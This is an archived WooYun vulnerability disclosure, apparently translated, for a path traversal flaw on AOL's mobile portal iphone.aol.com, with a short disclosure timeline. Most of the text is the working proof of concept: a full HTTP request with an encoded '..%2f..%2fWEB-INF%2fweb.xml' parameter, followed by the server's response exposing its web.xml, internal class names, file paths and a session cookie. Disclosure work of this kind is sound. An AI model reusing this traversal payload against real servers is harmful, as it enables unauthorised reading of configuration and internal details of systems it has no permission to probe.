WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
2015-03-25: Details reported to the vendor; awaiting vendor handling
2015-03-30: The vendor chose to ignore the vulnerability; details disclosed to the public
Mobile portal of AOL: iphone.aol.com
Proof of concept:
GET /ajax.jsp?m=..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&p=dynamicleadslide&vbclass=vid_over&ajax=1&sitHot=null&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config&dlItem=633100&dlug=false&cv=6&_c=main5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: iphone.aol.com
Accept-Encoding: gzip, deflate
web.xml retrieved:
HTTP/1.1 200 OK
Date: Wed, 22 Mar 2015
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=iphone.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
ModPagespeedDisableFilters: rewrite_javascript,inline_css
ModPagespeed: on
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 3506
Set-Cookie: JSESSIONID=16DABAA250AA22B57E02F9BAE2D18EC7; Path=/aol
Content-Length: 3506

<?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
  <display-name>portal5</display-name>
  <listener>
    <listener-class> com.aol.pubt.forc.util.ContextListener </listener-class>
  </listener>
  <listener>
    <listener-class> net.sourceforge.wurfl.core.web.WURFLServletContextListener </listener-class>
  </listener>
  <listener>
    <listener-class> com.aol.portals.core.ContextListener </listener-class>
  </listener>
  <context-param>
    <param-name>wurfl</param-name>
    <param-value>/data/servers/portal_fe_wurfl/wurfl.zip</param-value>
  </context-param>
  <context-param>
    <param-name>wurflPatch</param-name>
    <param-value>/data/servers/portal_fe_wurfl/wurfl_patch.xml</param-value>
  </context-param>
  <filter>
    <filter-name>VL6Filter</filter-name>
    <filter-class>com.aol.portals.core.utils.VL6Filter</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>VL6Filter</filter-name>
    <url-pattern>/*</url-pattern>
    <dispatcher>FORWARD</dispatcher>
  </filter-mapping>
  <filter>
    <filter-name>CMSFEPreviewFilter</filter-name>
    <filter-class>com.aol.pubt.dynapubcms.CMSFEPreviewFilter</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>CMSFEPreviewFilter</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>
  <filter>
    <filter-name>DataLayerTracking</filter-name>
    <filter-class>com.aol.portals.aol.TrackingModuleDataFilter</filter-class>
  </filter>
...................
Severity: no impact (ignored by vendor)
Ignored at: 2015-03-30 19:52
None yet